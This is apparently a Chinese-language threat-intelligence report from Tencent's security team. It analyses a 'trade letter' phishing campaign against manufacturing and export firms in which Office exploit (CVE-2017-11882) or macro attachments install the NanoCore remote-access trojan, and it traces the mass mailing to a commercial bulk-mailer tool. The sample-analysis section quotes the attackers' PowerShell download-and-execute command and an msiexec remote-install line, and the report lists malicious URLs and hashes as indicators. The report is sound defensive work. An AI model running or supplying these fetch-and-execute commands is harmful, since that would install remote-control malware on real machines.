长按二维码关注
御见威胁情报中心
一、背景
腾讯安全御见威胁情报中心检测到“商贸信”钓鱼邮件攻击在9月出现新一轮增长。在此次攻击中,黑客精心构造的带有office公式编辑器漏洞CVE-2017-11882或宏代码的恶意文档,将其作为附件批量发送至外贸行业企业邮箱中,在其打开文档中招后植入远控木马NanoCore进行机密信息窃取和远程控制,本次攻击高峰时期每天成功投递超3000个邮件地址。通过溯源分析,我们发现黑客疑似使用一款名为“****邮件群发器”的软件进行邮箱地址采集和邮件批量投递。据测算,该软件具有5000个/小时的邮箱地址采集能力,并且在发件时可以自动更换代理IP,已被黑客利用于针对对外贸企业的“自动化”攻击。部分受攻击企业如下:
根据御见威胁情报中心统计数据,有超过1000家企业受到此次攻击影响,其中近一半以上分布在广东、江苏、浙江和上海四地,其中广东占比超过30%。特别是广东深圳和东莞由于制造业和外贸行业密集,成为本次攻击受害最严重的区域。
从行业分布来看,“商贸信”攻击目标主要集中在工业制造及贸易行业。统计数据显示,被攻击的88%为制造业,剩余12%是与制造业提供相关联的销售、运输、商务服务行业。
二、攻击源
钓鱼邮件主要通过伪造以下发件邮箱进行发送,其中使用最多的为[email protected]。
[email protected]@[email protected]@[email protected]
以其中一封邮件为例,从邮件头部信息中可以看到发件人为“Keith Ward/SDG /UK”,发件邮箱地址为[email protected]。sdgtrading是一家总部位于英国的进出口贸易公司,目前打开该公司官方网站可以正常访问。打开网站的contact-us页面我们发现有一个职务为UK & European Sales(英国及欧洲地区销售)的人员联系方式为[email protected],而这正是钓鱼邮件发件邮箱(有两个字母位置交换)。我们推测攻击者可能通过爬取或者人工搜集的方式获取了该贸易公司的邮件地址,然后伪装成该公司的销售人员发送钓鱼邮件进行攻击。
钓鱼邮件发件人信息
贸易公司销售人员信息
三、样本分析
1
钓鱼邮件
邮件内容是关于贸易订单确认和价格咨询。邮件表述中高频出现出现以下词句:
“订购”、“价格”、“价目表”、“销售条件”、“折扣”、“装运日期”、“采购规格”等。
邮件中还指出邮件附件中包含“想要采购的产品条目”文档,请阅读后进行回复,部分文档名如下:
RFQ-SDG.doc
RFQ.doc
分析发现,附件文档中包含Office公式编辑器漏洞CVE-2017-11882利用代码或恶意宏代码,经过漏洞攻击或宏代码执行过程,会触发用于下载木马的Powershell命令执行,进一步下载木马:
cmd.exe /c PowerShell "try{$tA=$env:temp+\\\fo.exe\;Import-Module BitsTransfer;Start-BitsTransfer -Source \hxxps://oppofile.duckdns.org/a/gmb.exe\ -Destination $tA;(New-Object -com Shell.Application).ShellExecute( $tA);}catch{}"除了利用Powershell,还有部分攻击中使用Windows安装程序(msiexec.exe)安装MSI包文件进行木马下载:msiEXEc /i http[:]//oppofile.duckdns.org/d/dar.msi从目前捕获到的攻击文档中我们发现有以下木马下载地址:hxxp://oppofile.duckdns.org/c/alex.exehxxp://oppofile.duckdns.org/c/dar.exehxxp://oppofile.duckdns.org/c/alex.exehxxp://oppofile.duckdns.org/c/go.exehxxps://oppofile.duckdns.org/a/gmb.exehxxps://oppofile.duckdns.org/a/alex.exehxxp://oppofile.duckdns.org/d/dar.msihxxp://oppofile.duckdns.org/e/scan.msi
hxxp://oppofile.duckdns.org/e/gmb.msi
1
远控木马
被下载植入的实际上是的经过混淆的远控木马NanoCore,NanoCore是使用.Net语言编写的功能强大的远程访问控制木马(RAT),可以在目标主机上进行文件操作,屏幕控制,运行指定程序,还支持插件扩展功能,被感染NanoCore木马的电脑会出现严重信息泄露,攻击者还可以利用中毒电脑为跳板,对目标网络继续进行渗透入侵。
核心模块被加密后以位图格式保存在资源文件“tewo3zFRzUGateK2dRRrbMo6Wdh7BawEbNw3whpXsTZfWwZYJ5X2aQTf2rHJrHGpTdCgwV16xL12y4YmEZj1nol5xVq6OWJTNPKhhTT3tBIWOAi7IjgznVXv3N2fC3b2wvrYdjp6hvBPP0bLGemkdbuwNcxmAjipQGmsISXkujt”中
从资源中获取到数据后,经过多次解密得到最终的PE文件,然后将其Load到内存,并跳转到入口位置执行。
最终执行的NanoCore RAT功能强大,可执行各种恶意操作,如文件操作,注册表编辑,进程控制,文件传输,远程命令执行,键盘记录等。以下为该木马控制端界面:
四、溯源分析
1
群发软件
我们将捕获到的一个发件IP地址175.***.***.134输入到腾讯安图高级威胁溯源系统查询,通过排查,发现了一个名为“***\邮件群发器.exe”的可疑程序,该程序在近期访问了发件IP地址。
使用该可疑文件名中的“***邮件群发器”关键字进行搜索,发现了这款名为****的邮件群发器软件。该软件具有从网络上批量爬取邮箱地址,并针对获得的邮箱进行批量发送指定邮件的功能。
我们下载该软件,并进行注册和试用。根据其界面展示的功能,只需编写好邮件内容(任意填写发件人姓名)、批量添加收件人地址、点击“开始群发”三步,即可将邮件快速发送至大批的目标邮箱中。该软件还支持查看群发结果,如果有发送失败的情况,可以一键重发。发送时还可以选择自动更换代理IP,这在一定程度上可以隐藏真实发件IP。
该软件还有一个重要的功能是,支持从指定网站采集目标邮箱。该功能页面默认的源网站地址为http[:]//www.****.biz/。我们尝试使用该网站进行邮箱采集,在10分钟之内可以采集到近800个邮箱地址,换算后一个小时之内可以采集到5000个邮箱,而这些被采集到的邮箱都存在被攻击的可能。
可以看到这个默认的邮箱采集网站“**网”(www.*****.biz)是一个贸易信息发布平台,大量厂商(机械、化工、电气、能源、仪器等行业)在该网站上发布等各类产品的供应或求购信息。而每一条信息都会附带厂商的电话、邮编、邮箱等联系方式,“****邮件群发器”正是从这些信息中获取了大量的邮箱地址。
1
攻击思路
从以下几个角度,我们认为黑客使用了邮件群发软件“****邮件群发器”进行辅助攻击:1、群发软件“****”有近期访问发件人IP的记录;2、受害企业类型与“****邮件群发器”默认采集邮箱类型一致(工业品贸易公司);3、攻击的影响范围与该软件的采集能力吻合(受害邮箱约3000个/日 & 软件的采集能力约5000个/小时)。推测黑客实施攻击的思路如下:1、黑客下载邮件群发软件;2、构造带有CVE-2017-11882漏洞利用(或者宏代码)的office恶意文件;3、使用****邮件群发器从贸易分类信息网站批量采集目标邮箱地址;4、使用准备好的恶意文档作为附件,构造钓鱼邮件并批量发送;5、等待收件人打开附件并中招,通过远控木马NanoCore对目标进行远程控制。
五、总结在此次攻击事件中可以发现,黑客与灰产从业人员出现了交集。灰产人员开发出邮件群发工具,工具可针对网站上的公开邮箱进行爬取,可利用获取到的邮箱进行批量群发邮件。工具在其注册的“官网”上进行公开售卖,使用说明中“正义”地提到“仅用于正规邮件营销,滥用者后果自负”。但工具一旦售出,便难以保证被用于合法用途。
而黑客获得此软件后,将其纳入攻击武器中的一员。随后,只需编写好木马,构造钓鱼邮件,就可以利用该工具将钓鱼邮件自动化、大批量地发送至企业的相关邮箱中。
六、安全建议
1、企业邮箱网管将以下发件邮箱设置为黑名单
[email protected]@[email protected]@[email protected]
2、不要打开不明来源的邮件附件,对于附件中的文件要谨慎运行,如发现有脚本或其他可执行文件可先使用杀毒软件进行扫描;3、升级office系列软件到最新版本,及时修复office程序漏洞,不要随意运行不可信文档中的宏;4、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;5、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统;
IOCs邮箱[email protected]@[email protected]@[email protected]@dataone.inDOC(攻击邮件附件)fec34e9741abedea7f0a4fa991bdc61811dd68ba724a7e34cdab1aae97a931903f36befc186d10551b5a4d65ac35978de4b1a5e14064e7ce76153743f36befc186d10551b5a4d65ac35978d1ffd02ef62e8febfe5fbdb2ac16f17c2c9e4d75fd6b697cf0b357e2dac16f17c2c9e4d75fNanaCore RAT2cfeae6ebdead276453a235ad5ea7055f2af2c51c95a5bb2Domainoppofile.duckdns.orgURLhxxp://oppofile.duckdns.org/c/alex.exehxxp://oppofile.duckdns.org/c/dar.exehxxp://oppofile.duckdns.org/c/alex.exehxxp://oppofile.duckdns.org/c/go.exehxxps://oppofile.duckdns.org/a/gmb.exehxxps://oppofile.duckdns.org/a/alex.exehxxp://oppofile.duckdns.org/d/dar.msihxxp://oppofile.duckdns.org/e/scan.msihxxp://oppofile.duckdns.org/e/gmb.msi